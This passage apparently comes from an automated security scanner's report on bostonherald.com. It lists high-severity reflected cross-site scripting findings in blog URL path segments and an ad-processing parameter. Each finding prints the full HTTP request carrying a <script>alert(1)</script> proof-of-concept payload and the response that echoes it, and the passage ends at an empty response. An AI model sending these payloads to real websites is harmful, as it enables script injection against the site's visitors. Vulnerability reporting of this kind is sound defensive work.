<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/0170037\"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

2.3. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c27"><script>alert(1)</script>81822d7f333 was submitted in the REST URL parameter 7. This input was echoed as 95c27\"><script>alert(1)</script>81822d7f333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/2795c27"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/2795c27\"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

2.4. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3652"><script>alert(1)</script>947a9457054 was submitted in the REST URL parameter 8. This input was echoed as d3652\"><script>alert(1)</script>947a9457054 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652"><script>alert(1)</script>947a9457054/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:11:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652\"><script>alert(1)</script>947a9457054/">
...[SNIP]...

2.5. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ef4"><script>alert(1)</script>1dd41ef465f was submitted in the REST URL parameter 5. This input was echoed as 19ef4\"><script>alert(1)</script>1dd41ef465f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/201119ef4"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:07:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:07:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/201119ef4\"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/">
...[SNIP]...

2.6. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dab"><script>alert(1)</script>b404e1442a7 was submitted in the REST URL parameter 6. This input was echoed as 13dab\"><script>alert(1)</script>b404e1442a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/0113dab"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:08:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/0113dab\"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/">
...[SNIP]...

2.7. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3824"><script>alert(1)</script>ec4b7781a2e was submitted in the REST URL parameter 7. This input was echoed as a3824\"><script>alert(1)</script>ec4b7781a2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26a3824"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26a3824\"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/">
...[SNIP]...

2.8. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0bb1"><script>alert(1)</script>0c6338846da was submitted in the REST URL parameter 8. This input was echoed as d0bb1\"><script>alert(1)</script>0c6338846da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1"><script>alert(1)</script>0c6338846da/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1\"><script>alert(1)</script>0c6338846da/">
...[SNIP]...

2.9. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59440"><script>alert(1)</script>a90735c589b was submitted in the REST URL parameter 5. This input was echoed as 59440\"><script>alert(1)</script>a90735c589b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/rap_sheet/index.php/201159440"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:01:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:01:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/rap_sheet/index.php/201159440\"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/">
...[SNIP]...

2.10. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea2b"><script>alert(1)</script>c53f3083bf9 was submitted in the REST URL parameter 5. This input was echoed as 8ea2b\"><script>alert(1)</script>c53f3083bf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/20118ea2b"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/20118ea2b\"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

2.11. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9bc2"><script>alert(1)</script>4c7b0ea2d57 was submitted in the REST URL parameter 6. This input was echoed as b9bc2\"><script>alert(1)</script>4c7b0ea2d57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/red_sox/index.php/2011/01b9bc2"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:04:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:03:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/2011/01b9bc2\"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/">
...[SNIP]...

2.12. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a67b1</script><script>alert(1)</script>4ab8f6765b0 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

